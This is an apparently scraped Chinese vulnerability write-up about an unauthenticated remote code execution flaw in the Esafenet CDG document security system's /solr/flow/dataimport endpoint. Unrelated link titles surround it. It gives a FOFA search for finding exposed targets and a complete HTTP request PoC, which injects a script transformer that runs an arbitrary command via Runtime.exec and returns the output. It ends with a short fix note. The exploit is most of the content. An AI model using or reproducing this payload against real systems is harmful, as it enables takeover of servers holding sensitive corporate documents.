当前位置: 首页 > news >正文

合肥高端网站建设设计公司硬件开发工程师招聘

合肥高端网站建设设计公司,硬件开发工程师招聘,如何让做网站,四川住房建设厅网站0x01 产品简介 亿赛通电子文档安全管理系统#xff08;简称#xff1a;CDG#xff09;是一款电子文档安全加密软件#xff0c;该系统利用驱动层透明加密技术#xff0c;通过对电子文档的加密保护#xff0c;防止内部员工泄密和外部人员非法窃取企业核心重要数据资产…0x01 产品简介 亿赛通电子文档安全管理系统简称CDG是一款电子文档安全加密软件该系统利用驱动层透明加密技术通过对电子文档的加密保护防止内部员工泄密和外部人员非法窃取企业核心重要数据资产对电子文档进行全生命周期防护系统具有透明加密、主动加密、智能加密等多种加密方式用户可根据部门涉密程度的不同如核心部门和普通部门部署力度轻重不一的梯度式文档加密防护实现技术、管理、审计进行有机的结合在内部构建起立体化的整体信息防泄露体系使得成本、效率和安全三者达到平衡实现电子文档的数据安全。 0x02 漏洞概述 亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞未经授权的攻击者可通过此漏洞执行任意指令从而获取服务器权限。 0x03 复现环境 FOFAapp亿赛通-电子文档安全管理系统 0x04 漏洞复现  http://your-ip/solr/flow/dataimport 出现以上这种情况可能存在漏洞 PoC POST /solr/flow/dataimport?commandfull-importverbosefalsecleanfalsecommitfalsedebugtruecoretikanamedataimportdataConfig%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22执行的命令%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1383.67 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Host: your-ip?xml version1.0 encodingUTF-8?RDFitem//RDF dnslog验证 RCE 0x05 修复建议  设置安全组仅对可信地址开放 升级至安全版本
http://www.hkea.cn/news/14575826/

相关文章:

  • 中国最好的网站建设公司如何管理网站
  • 杭州做企业网站公司网站建设与维护网课
  • 乐山建网站网站建设与管理代码
  • 中国建设部网站四库平台欧美 手机网站模板下载 迅雷下载 迅雷下载地址
  • 广州网站建设推广报价wordpress插件版本回退
  • 中山建设网站公司百度公司电话是多少
  • 帝国网站后台认证码错误建设厅公积金中心网站
  • 哪个网站可以找设计师做设计长腿蜘蛛wordpress
  • 哈尔滨站建好了吗微信管理系统在哪里找
  • 做视频网站都需要什么软件下载网站参数
  • 工信部网站备案规定做外贸推广的网站
  • 做网站选哪家公司城乡建设部统计网站
  • 免费网站制作推广南京网站制作哪家专业
  • 聊城网站公司企业网站制作哪家好
  • 宣汉网站建设单位网站建设维护论文
  • 不忘初心网站建设定边网站建设
  • 外网视频网站做泥声控手机钓鱼网站免费制作
  • 手机端网站设计模板我的企业邮箱在哪里看
  • 湖北中英双语网站建设做网站要用什么服务器吗
  • 网站怎么seo关键词排名优化推广乐陵市住房和城乡建设局网站
  • e4a做网站软件成都网站seo分析
  • 介绍一学一做视频网站网站建设开发详细步骤流程图
  • 中昌国际建设集团网站哪家app软件开发公司好
  • 网站如何做首面关键词企业信用信息公示系统网址年检
  • 老鹰网站建设wordpress 4.4.7
  • 网站建设宣传预算网站建设上海
  • 做网站需要填什么武义县网站建设公司
  • 网站集约化建设工作打算wordpress邮箱模板
  • 做游戏直播那个网站济南网站建设服务公司
  • 安徽元鼎建设工程网站甘肃省建设厅官方网站质监局